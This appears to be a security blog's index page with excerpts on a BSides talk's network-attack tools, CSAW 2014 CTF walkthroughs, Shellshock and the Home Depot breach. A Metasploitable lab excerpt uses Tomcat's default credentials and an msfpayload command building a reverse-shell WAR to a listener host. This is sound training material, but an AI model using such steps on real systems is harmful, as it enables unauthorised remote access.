Bsides 2015 Talk

This is my talk from Bsides Boston 2015. I feel overall the talk went well even though I did not have my presenter's notes due to a projector issue.

I have removed the demo videos from the slides to save on space, but you can see them below as well as download the PowerPoint file.

Tools I used:

- Decrypt.ps1 (for decrypting the Windows GPO entry)
- Karma/Mana/NetHunter
  - https://github.com/karma-runner/karma
  - https://github.com/sensepost/mana
  - http://www.nethunter.com/
- Frogger
  - https://github.com/nccgroup/vlan-hopping
- Responder
  - https://github.com/SpiderLabs/Responder

Resources:

http://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning
http://en.wikipedia.org/wiki/VLAN_hopping

You can watch my talk below.

Shellshock demo set-up and POC

I’m not sure if everyone has been made aware of this, but a BASH vulnerability has been discovered… /sarcasm

OK, seriously, as everyone has heard by now, “Shellshock” is the new hot topic right now. Since I am one who learns by doing, I decided to give it a go and see exactly how it works. My first instinct was to see how it works against the SSH protocol (CGI write-up is coming soon). Now that I see what it actually is, it would take an extraordinary set of circumstances for it to be a viable method of gaining entry (at least through SSH), but should those circumstances be present in your environment, it could be devastating (so make sure you patch everything up!).

CSAW 2014 walkthrough – Fluffy No More

Fluffy No More was a Forensics 300 point challenge at CSAW 2014. The backstory seemed kind of funny and I thought I’d give it a shot!

[Image: Fluffy No More challenge description]

Setup

The attached tarball contained a few additional tarballs:

  • Full /etc directory contents
  • Full /var/log directory contents
  • Full /var/www directory contents
  • A MySQL database dump file

The task was to determine the attacker’s ingress point as well as discover a key for the CTF challenge. I cover both points in the sections below.

CSAW 2014 walkthrough – pybabbies

pybabbies was an Exploitation 200 challenge during the CTF and I got “voluntold” to work on this one by my teammates since I have a strong Python background. The night was young and I felt pretty good about it, so I took a look.

[Image: pybabbies challenge description]

Setting the scene

Connecting to that IP/port with netcat revealed a shell prompt indicating that I had connected to a Python sandbox environment. Python sandboxes are nothing new, and I had actually recently done some reading on a sandbox challenge from an older CTF write-up, so I felt pretty good about what I was getting myself into.

Metasploitable Series – Tomcat

In this episode we are going to take a look at the Tomcat Service on our Metasploitable Box.

Let's start with an Nmap scan…

So we can see on port 8180 we have Tomcat running… Let's take a look at it…

As we can see, the Tomcat manager requires a login. I know that by default the username and password are both ‘tomcat’, so let's try that.

We have logged into the manager application! Let's now take a look at generating a reverse shell!

msfpayload linux/x86/shell_reverse_tcp LHOST=172.16.28.245 LPORT=4444 W > myshell.war

Enumerator PIP install is live

Great news! After collaborating with felux (@sugarstackio) of http://sugarstack.io in #overflowsec, I'm excited that Enumerator is now a pip install within Python! Woohoo!

More information can be obtained at Enumerator PIP. Give it a once-over; it's an easy install now.

Thanks, felux, for all of the hard work; the project is coming along great. Look for more updates in the future.

Simple Buffer Overflow bypassing SEH

Recently, I have gotten more interested in exploit writing and the entire process of it. Being a noob to this, I obviously started my quest by looking for tutorials. Unfortunately I wasn't able to find the “Explain like I'm 5” tutorial that I needed, and the entire process took me much longer than anticipated. Now that I finally got it figured out, I wanted to share with the world! 😀

Home Depot Data Breach

Details are still not clear, but at this point we do suspect there has been a large data breach at The Home Depot. There is no reason to believe only some stores were affected, and chances are the breach is spread across the company's 2,000+ stores.

Banks are saying they have seen “suspicious” activity so far dating back to April of 2014. If that is the case, we need to think of the impact this could have. If you remember back, Target had only been breached for 2-3 weeks and leaked some 40 million credit and debit cards.

New Video Series

We are excited to announce we have started production on our first video series: “Metasploitable without Metasploit”. The focus of this video series is to teach the up-and-coming InfoSec student how to manually exploit Metasploitable. This is going to help you get a much better understanding as to why these exploits work and what makes them tick.

Don't get us wrong, we love Metasploit, but we also feel it is important to have a solid foundation in exploitation the manual way. This video series was inspired by taking the OSCP course, which has very strict guidelines for when and what you can do with Metasploit.

The opinions and thoughts on this blog are those of Overflow Security members, and do not reflect those of our members' employers.